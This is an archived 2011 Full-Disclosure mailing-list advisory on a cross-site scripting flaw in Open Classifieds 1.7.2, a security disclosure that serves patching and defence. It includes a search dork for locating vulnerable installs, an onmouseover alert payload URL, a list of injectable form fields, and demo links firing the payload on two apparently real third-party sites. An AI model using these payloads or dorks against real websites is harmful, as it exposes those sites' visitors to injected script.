[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Open classifieds 1.7.2 Xss Vulnerability

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Open classifieds 1.7.2 Xss Vulnerability
From: Yassin idrissi <01xp01@xxxxxxxxx>
Date: Wed, 24 Aug 2011 03:56:11 +0000

new xss found on an open source software >> Open Classifieds 1.7.2
Author : Yassin Aboukir

---------------------------------------------------------------------
[+] Title              :  Open Classifieds v1.7.2 XSS Vulnerability
[+] Affected Version   :  v1.7.2
[+] Software Link      :  http://open-classifieds.com/
[+] Tested on          :  Windows 7 <Firefox>
[+] Date               :  23/08/2011
[+] Dork               :  “inurl:/publish-a-new-ad.htm”
[+] Category           :  Webapps
[+] Severity           :  Medium
[+] Author             :  Yassin Aboukir <01Xp01|At|Gmail.com
[+] Site               :  http://www.yaboukir.com
----------------------------------------------------------------------
[+] About the software:
Open Classifieds, is a free open source script for classifieds, advertisements 
or listings. This web application is developed to be fast, light, secure and 
SEO friendly. Template enabled and easy to administrate. Some features: 
Friendly URLs, Cache, Captcha, MySql+PHP+GPL.

[+] Description :
Cross-site scripting (XSS) is a type of computer security vulnerability
typically found in web applications that enables attackers to inject client-side
script into web pages viewed by other users. A cross-site scripting
vulnerability may be used by attackers to bypass access controls such as the
same origin policy.

[+] How that can be exploited :

# –
http://localhost/oc172/?s=”+onmouseover=alert(00000)+
Move the mouse cursor to the search form, then an alert window will show up.

# –
1- Go to :  http://localhost/publish-a-new-ad.htm
2- name & email & place & price & title are vulnerable to XSS, so that the 
attacker may inject malicious scripts.


[+] Fix :  upgrade to last release.

[+] Demos           : 
http://www.thatdamnedbike.com/oc172/?s="+onmouseover=alert(00000)+
http://www.estudiowebcreativo.com/oc172/?s="+onmouseover=alert(00000)+

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x16
Next by Date: Re: [Full-disclosure] Apache Killer
Previous by thread: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x16
Next by thread: [Full-disclosure] CFP: Special Issue of COMPUTER NETWORS (ELSEVIER) on 'Botnet Activity: Analysis, Detection and Shutdown'
Index(es):
- Date
- Thread